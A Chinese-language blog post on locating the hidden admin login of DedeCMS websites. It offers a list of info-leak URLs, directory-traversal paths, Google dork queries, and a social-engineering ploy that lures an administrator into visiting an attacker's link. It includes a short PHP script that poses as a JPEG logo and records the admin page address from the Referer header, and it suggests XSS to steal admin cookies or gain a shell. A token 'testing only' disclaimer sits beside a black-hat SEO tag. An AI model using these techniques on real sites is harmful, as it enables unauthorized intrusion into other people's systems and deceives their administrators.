猿对象
技术博客

如何获取dedecms网站后台?

天天领购物红包,每天10点和15点更新购物红包!公众号搜索:小猿优品 查看二维码

仅能用作网站安全测试,非法用途万不可取

解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。
后台:默认的是dede/login.php

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

员帐号,新版本的就直接转向了后台.

2.include/dialog/config.php会爆出后台管理路径

3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录

4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.

5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉

到根目录去.不过这些版本的访问地址有些不同.

地址为require/dialog/select_soft.php?activepath=/././././././././

include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..

存在相同问题的文件还有

include\dialog\select_images.php

include\dialog\select_media.php

include\dialog\select_templets.php

6.有时后台也可以利用http://xxx.com/include/fckeditor/editor/fckeditor.html直接跳转到后台

或者网址名称其他的一些。

首先是默认后台地址:/dede

然后,比较懒的站长会改成/admin,/manage (可以用burpsuite进行目录枚举)

织梦dedecms利用文件查找后台的技巧:
1、/include/dialog/select_media.php?f=form1.murl

2、/include/dialog/select_soft.php

3.使用mysql_error 信息去试试
/data/mysql_error_trace.inc 

4./robots.txt
/data/admin/ver.txt

5.DedeCmsV5.1 FreeSP1访问
http://127.0.0.1/include/dialog/ … =/include/FCKeditor
可以跳转目录跳转到根目录的方法为:
http://127.0.0.1/include/dialog/ … h=/././././././././
而且DEDECMS在访问不存在的目录时会报错如访问
http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造

http://127.0.0.1/include/dialog/ … =/include/FCKeditor

其实方法很简单自己偶然发现的:

通过百度的浏量统计找到后台地址
只要是流量统计网站都可以,其实不用百度,
(1)xxoo:弄一个你能看到流量统计的域名
(2)ooxx:去给管理员留言,吧你域名通过网站留言发给他说要加友情链接,他肯定会在后台看的,

(3)oxxo:等他看了你的留言,他肯定会打开你的网址,你去自己域名的流量哪里看看 ‘入口页面’ 就能看到他网站的后台地址

7.利用xss

这个不能单单算是找后台了,因为xss会x到管理的cookie和后台地址,或者是xss结合csrf可以直接拿shell,详细请见wooyun

8.google hack
在搜索引擎里面所有这个关键字,点开连接之后,再去掉这个关键字,他的后台就出来了
原理就是dedecms网站的后台都有这么一个广告,而且通常都是在网站后台后面
所以,只要有这个广告的网站,基本都能暴露后台了。

这是关键字

inurl:?dopost=showad site:xxoo.com

9.织梦某处设计缺陷导致后台地址泄露
DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。
且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。

X.PHP 代码:

<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("x.jpg");
imagejpeg($img);
imagedestroy($img);
?>

当访问该文件,获取$_SERVER[‘HTTP_REFERER’],并且写出文件到X.TXT。

其他方法:可以社工猜解,利用google hack :”site:xxoo.com inurl:login.php 织梦管理中心”

以上方法为以前的常用方法,适用于织梦过去的版本,漏洞不兼容,哈哈哈.本版本是我自己使用的版本,综合了众多的织梦后台暴露漏洞

文章类别:dedecms / SEO / 安全技术 / 安全知识 / 网络安全 / 黑帽seo

如有转载,请注明本文链接: https://www.apedear.com/154.html

赞(5) 打赏
推荐转载但是加个友情链接噢o(* ̄︶ ̄*)o:猿对象_网站运营SEO个人技术博客 » 如何获取dedecms网站后台?
分享到: 更多 (0)
标签:
点击领取👉淘宝拼多多京东优惠卷
点击领取👉淘宝拼多多京东优惠卷

评论 抢沙发

智奇网络个人工作室,放心,省心!

淘宝店铺智奇网络

觉得文章有用就打赏一下小编O(∩_∩)O~

支付宝扫一扫打赏

微信扫一扫打赏